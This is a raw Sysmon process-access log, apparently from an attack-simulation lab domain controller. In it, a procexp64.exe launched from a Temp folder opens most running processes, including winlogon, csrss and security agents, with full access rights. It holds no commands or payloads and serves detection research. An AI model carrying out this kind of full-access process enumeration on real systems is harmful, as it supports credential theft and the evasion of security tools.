15:16:12.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-323A-6010-C8A2-00000000A301}6316C:\Windows\SysWOW64\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787737Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.814{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787736Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787735Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787734Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787733Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787732Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787731Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787730Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787729Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787728Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787727Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787726Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787725Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787724Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787723Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787722Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787721Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787720Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787719Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787718Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787717Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787716Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787715Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787714Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787713Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787712Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787711Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787710Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787709Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787708Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787707Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787706Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787705Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787704Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787703Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787702Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:12.799{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787701Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 